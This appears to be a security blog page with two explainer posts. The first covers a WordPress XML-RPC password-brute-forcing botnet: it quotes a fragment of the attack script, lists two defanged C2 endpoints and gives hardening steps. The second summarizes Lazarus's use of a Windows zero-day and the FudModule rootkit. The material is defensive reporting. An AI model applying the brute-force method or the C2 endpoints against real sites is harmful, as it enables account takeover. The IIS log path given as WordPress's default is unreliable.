Categories
Coding Hacking Security

WordPress Password-Cracking Botnet: What to Know

Since 2018, password-cracking botnets has been targeting WordPress sites. These botnets are made of infected WordPress sites that are then being repurposed to perform brute force attacks on other WordPress sites. The active threat-actors employ the use of the native XML-RPC interface of WordPress to brute-force username/password pairs; the end-goal is to gain access to privileged accounts, and then use the enslaved computer to repeat the process on other machines.

How the Botnet Works

What is a botnet?

A botnet is a network of infected machines, that deploy tactics such as  malicious code and remote access, to help spread the infection, while originating from a sole actor.

Russian Origins

The particular botnet in question, works by using a group of four command and control (C2) servers, sending server-side requests to over 14,000 proxy servers, provided by a Russian domain called best-proxies[.]ru. However, some digital-footprints point to server existence in Romania and the Netherlands as well.

These proxy servers are used to anonymize the C2 traffic. The requests are then sent to over 20,000 infected WordPress sites, which are running an attack script. This script attacks targeted WordPress sites by attempting XML-RPC authentication to access privileged accounts.

function createFullRequest($login, $passwords){
$xml = createRequestXML();
for($i = 0; $i < count($passwords); $i++){ $xml = addElementXML($xml, $login, $passwords[$i]); } $request = $xml->saveXML();
return $request;
}

The script itself generates passwords pulled from publicly accessible credential patterns; once a pattern is determined, it will apply said pattern in a brute force test. For instance, if the script is attempting to log on to example.com as the user Alice, it will utilize passwords such as Alice1, Alice2018, and so on. This tactic can be very effective when used at scale across a large number of targets.

The C2 system’s issuing instructions to the script can optionally define $startPass and $endPass variables, which tell the script to only attempt a subset of passwords on a given list, instead of running the entire set. This greatly increases the speed at which the whole system operates.

Similar Attacks

As recent as February 2024, similar attacks have been seen injecting custom malicious JavaScript into WordPress sites unknowingly, causing site visitors to be silently redirected in the background. The hidden redirection points the visitor to a malicious clone of the site, reporting a user name and list of passwords to a getTask method; as a result, the hackers are given a list of credentials that are tried against said accounts; the cycle then continues with other machines, so on and so forth, in a never ending loop of credential requests and results.

const getTaskUrl = 'hxxps://dynamic-linx[.]com/getTask.php';

const completeTaskUrl = 'hxxps://dynamic-linx[.]com/completeTask.php';

It is not yet known where the source of this modern take on the Botnet attack originates from, as the botnet is already quite large, amassing a list of approximately 1,200 effected IPs in just under four days. However, Security Specialists are working toward a solution.

Learn more about this from ars Technica!

How Do You Know?

It’s generally no small task to determine if you’ve been infected, much less the source of infection, as malware by design hides itself thoroughly. The first place to look for infection, with regards to WordPress, is your server/site logs, generally defaulted to the location: C:\inetpub\logs.

Additionally, check within your installation’s Web-Admin, Content and User folders for any recent or suspicious changes.

How to Protect Your WordPress Site

To protect your WordPress site from this type of attack, it’s important to take the following steps:

  1. Use strong, unique passwords: Make sure that you are using strong, unique passwords for all of your WordPress accounts; this will make it more difficult for the attackers to gain access to your site. Additionally, consider employing 2factor authentication methods to your users’ login.
  2. Limit login attempts: Consider using a plugin to limit the number of login attempts that can be made to your site; this will help to prevent brute force attacks. Many of these plugins offer further customization beyond limited attempts, such as lockout periods and ip blacklisting.
  3. Remove unused user accounts: If you are no longer using an account, or you believe an account may be compromised, it’s safest to remove the account entirely, as you can always recreate it later. In addition, if your site is fully setup, consider removing the default admin account as this is the first account tried by hackers in their attempts to bypass your site’s security.
  4. Keep your WordPress site up to date: Make sure that you are running the latest version of WordPress and that all of your plugins and themes are up to date. By updating on a consistent schedule, you can insure your system loads the current security patches and bug fixes that are included in the update.
  5. Use a security plugin: Consider using a security plugin to help protect your site. There are many free and paid options available that can help to prevent brute force attacks and provide other security features, such as custom reports and notifications.

We recommend the free plugin Loginizer, which includes brute-force protections and failed login attempt alerting

Conclusion

The recent WordPress password-cracking botnet is a serious threat to WordPress sites. However, that is only the tip of the security iceberg. As more and more computers become infected, from seemingly ‘normal’ websites, malware can travel stealthily behind the scenes. By taking proper precautions,  you can protect yourself from this type of attack, as well as countless others.

Categories
Development Hacking Security

Lazarus Group Exploits Windows Zero-Day for Privilege Escalation with FudModule Rootkit

1. Lazarus

The Lazarus group, a North Korean collective known for cyber-system sabotage, has recently been exploiting a Windows kernel privilege escalation vulnerability (CVE-2024-21338) in the form of a zero-day. This vulnerability is found within appid.sys, the core driver of AppLocker, Microsoft’s application whitelisting app; this newly discovered vulnerability earned a score of 7.8 out of 10 on the CVSS scale.

Lazarus has taken advantage of the vulnerability with the use of the FudModule rootkit, a data-only rootkit that accesses kernel read/write privileges through your machine’s drivers; the ultimate goal – bypass Windows security mechanisms.

Prior to the most recent iteration of this exploit, attackers would expose read/write privileges by attacking known vulnerabilities in third-party drivers. However, with the FudModule rootkit, hackers can deliver a special handle table entry manipulation technique to suspend PPL (Protected Process Light) protected processes.

Those AV Programs effected include, but are not limited to, Microsoft Defender, CrowdStrike Falcon, and HitmanPro.

2. FudModule

The FudModule rootkit itself is a frighteningly versatile piece of malware; it leverages kernel level read/write access to disable important features that security products rely on to detect suspicious behavior. This includes register callbacks, object callbacks, and process, thread, and image kernel callbacks.

It also is capable of removing file system minifilters used by AV Programs to monitor file operations.

This behavior is used by AV Products to find and block effected drivers; keep in mind that not all updates applied to an effected driver necessarily remove the instances of the old versions, thus leaving those weak spots open to attack.

Another additional rootkit behavior targets specific AV’s altogether, as mentioned earlier, rendering their security bypassed and non-functional.

3. Summary

The Lazarus Group is one of the most well-known and persistent threats to cybersecurity. The FudModule rootkit is only the most recent display of there technical prowess.

It is important for organizations to stay vigilant in their security; this includes taking proper precautions, addressing potential leaks/weaknesses in infrastructure, and regularly applying updates. Additionally, having monitors in place will help spot suspicious behavior before anything malicious occurs.

Staying educated, up to date, and aware will serve your system’s security in the long-term.